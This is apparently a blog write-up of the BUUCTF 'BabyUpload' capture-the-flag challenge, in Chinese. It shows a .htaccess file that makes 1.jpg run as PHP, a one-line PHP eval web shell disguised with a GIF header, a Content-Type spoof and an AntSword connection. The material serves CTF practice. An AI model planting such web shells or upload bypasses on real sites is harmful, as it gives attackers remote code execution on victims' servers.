buuctf-BabyUpload

前言

之前整理了一些upload-lab的知识，为了学到更多有关文件上传的知识，想着透过题目练习一下。

话不多说，整活~

解题

我们先打开此题的链接。还是我们需要上传文件

此题的Content-Type为image/jpeg

而且我们需要上传一个.htaccess文件。内容如下：

<FilesMatch "1.jpg">//这里的文件名是要与之后你上传的一句木马的文件保持一致的
SetHandler application/x-httpd-php
</FilesMatch>

我们的一句话木马内容如下：

GIF89a?
<script language="php">eval($_POST['a']);</script>

因为文件名后缀不能是 ph 开头，文件内容过滤<?

好，我们先上传htaccess文件，用bp抓包检查一手。

 这里的文件类型一定要改成image/jpeg

上传成功，下一步我们再上传jpg文件，一句话木马

 上传成功。

最后用蚁剑连接，路径为

http://76ebb94d-84e4-48c1-88df-83517130c760.node3.buuoj.cn/upload/0afb3cc4b734e045c221137554c5b0cd/1.jp

连接成功得到flag

若对以上的一些知识点有一些不了解，可参考文件上传

本人对于文件上传也是在上传中，若解答有误，请联系我。谢谢！！